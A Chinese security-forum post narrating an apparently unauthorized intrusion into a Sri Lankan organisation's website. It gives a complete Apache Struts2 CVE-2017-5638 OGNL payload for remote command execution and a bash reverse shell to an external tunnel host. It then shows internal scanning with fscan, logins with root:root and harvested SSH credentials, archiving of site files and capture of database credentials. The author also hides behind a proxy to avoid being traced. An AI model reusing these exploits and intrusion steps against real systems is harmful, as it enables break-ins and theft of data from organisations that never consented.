XD安全交流

 找回密码
 注册交流

QQ登录

只需一步,快速开始

快捷发帖
查看: 19|回复: 0

记一次丝滑的渗透测试——小七

[复制链接]
  • TA的每日心情

    2025-4-18 08:21
  • 签到天数: 1 天

    [LV.1]初来乍到

    9

    主题

    12

    帖子

    136

    积分

    认证安全响应员

    Rank: 2

    积分
    136

    XD社区嘉宾QQ群管理勋章赞助会员

    发表于 2025-4-18 11:04:14 | 显示全部楼层 |阅读模式
    XD论坛免责声明
    本论坛为网络技术研究交流平台,所有内容仅限于学术探讨、防御技术提升及合法授权测试场景。禁止任何主体将本站技术信息用于非法渗透、网络攻击、数据窃取等违法犯罪活动。用户发布内容须符合《网络安全法》《数据安全法》等中国法律法规及所在司法辖区法律要求,禁止传播恶意代码、漏洞利用工具等非法资源。所有技术文档需明确标注适用场景(如:竞赛环境、授权渗透测试),提供实验环境搭建指南及风险控制方案。用户需承诺不利用本平台技术进行未授权测试,因技术滥用导致的法律后果由行为人独立承担。免责条款‌:用户因技术误用导致的系统瘫痪、数据丢失等后果,本平台不承担任何连带责任,技术交流产生的观点分歧及学术争议,不代表本论坛的官方立场,论坛不担保技术文档的绝对安全性,使用者应自行搭建隔离测试环境。
    本帖最后由 小七 于 2025-4-18 11:06 编辑

    注意:本文章仅用于技术交流学习,请勿用于非法用途,否则后果自负


    本次测试的是一个斯里兰卡的站点,相关内容均厚码处理



    fofa返回的结果是只有四个资产且全部都是一个域名下的
    这是一个后台,但酷酷习题大法在这里已经没用了,由于站点比较冷门,筛不到这个站点,只能一边用漏扫一边手动测。
    由于它是后台,我首先想到了sql注入,直接抓到请求包然后扔sqlmap跑
    根据其前台的功能点,又找到一处与数据库交互的地方:


    分别用sqlmap跑这两个post包后,均失败


    此时再查看漏扫:


    CVE-2023-48795,是ssh前缀截断攻击,其原理为:攻击者可以在初始密钥交换期间注入任意数量的SSH消息,并在交换完成后移除相同数量的消息,从而破坏SSH扩展协商(RFC8308),可降级连接的安全性。但是,它的利用条件比较苛刻,需要从本地网络发起,这点我们是做不到的。


    CVE-2017-5638,这是一个RCE(没想到24年扫到了17年的老洞),这个单位的运维也是上大分了,这个利用很简单,只需要改请求包中Content-Type的值即可实现rce

    poc:

    [AppleScript] 纯文本查看 复制代码
    Content-Type:  %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

    那么直接发请求包:


    也是成功利用了。
    先看看它可以通过什么方式反弹shell
    [AppleScript] 纯文本查看 复制代码
    whereis nc bash python php exec lua perl ruby


    尝试通过nc反弹shell(由于担心攻击机被溯源,我开代理+内网穿透):




    不知道为什么连不上,再试试bash反弹:
    [AppleScript] 纯文本查看 复制代码
    bash -i >& /dev/tcp/16.tcp.cpolar.top/14898 0>&1


    这次成功了
    回头看cve-2023-48795,它攻击面较小,条件也是苛刻中的苛刻,这里我附上相关文章,各位感兴趣的观众可以去看看
    https://blog.csdn.net/Xxy605/article/details/135199758
    这里我想看看它都开着什么端口,本能地输入了一个nmap,没想到还真有(运维上大分)
    因为可以出网啥的,我就直接塞了个fscan进去,然后开始扫端口,ip



    开了个zabbix
    扫了一顿啥也没有,一看版权信息是2019的,搜一下历史洞
    搜到了cve-2022-23131,cve-2024-22116,不过这些漏洞均无法利用。
    这里尝试./fscan -h 172.20.1.1/16 -c id -t 100000来爆破一下内网机器
    扫了一顿发现172.20段有且只有172.20.252.1存在弱口令(root:root),
    然后history看到前面的几条命令有很多ssh连接记录(记录均为内网),果断翻找ssh凭据,同时fscan扫描整个172段



    像这样的ip出来了28个


    测试了一下也都可以登上去,只能说逆天
    PING过后也正常
    也可以出网
    此时我黄豆就开始幻想了,幻想自己是比肩年姐那样的顶尖红队大玉,可以手撕内网
    为了拓宽攻击面,我 cat ~/.ssh/known_hosts


    只有可怜的五台(172.20.252.2还登不上去)
    然后再来看3389(windows上的内网渗透容易于linux)


    未果
    那现在只能先脱网站文件,审计来扩大攻击面了(又特么回到起点了)
    [AppleScript] 纯文本查看 复制代码
    tar -cvf 114514.tar *
    一边脱着,我就想看看他装了什么软件,直接yum list,然后给我报了个这个玩意:


    目前收获:内网机器*28,邮服*1
    然后审到了数据库账号密码,想进一步看看数据库,没想到这羁绊系统,虽然有17年的陈年nday但是还有蓝队值守,给我光速拔线了

    屋檐了。


    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有账号?注册交流

    x
    XD论坛免责声明
    本论坛为网络技术研究交流平台,所有内容仅限于学术探讨、防御技术提升及合法授权测试场景。禁止任何主体将本站技术信息用于非法渗透、网络攻击、数据窃取等违法犯罪活动。用户发布内容须符合《网络安全法》《数据安全法》等中国法律法规及所在司法辖区法律要求,禁止传播恶意代码、漏洞利用工具等非法资源。所有技术文档需明确标注适用场景(如:竞赛环境、授权渗透测试),提供实验环境搭建指南及风险控制方案。用户需承诺不利用本平台技术进行未授权测试,因技术滥用导致的法律后果由行为人独立承担。免责条款‌:用户因技术误用导致的系统瘫痪、数据丢失等后果,本平台不承担任何连带责任,技术交流产生的观点分歧及学术争议,不代表本论坛的官方立场,论坛不担保技术文档的绝对安全性,使用者应自行搭建隔离测试环境。
    回复

    使用道具 举报

    懒得打字嘛,点击右侧快捷回复 【右侧内容,后台自定义】
    您需要登录后才可以回帖 登录 | 注册交流

    本版积分规则

    QQ|Archiver|手机版|小黑屋|小段安全交流论坛 ( 冀ICP备2024093090号-1 )

    GMT+8, 2025-4-30 19:33 , Processed in 0.171112 second(s), 32 queries .

    Powered by Discuz! X3.4

    Copyright © 2001-2020, Tencent Cloud.

    快速回复 返回顶部 返回列表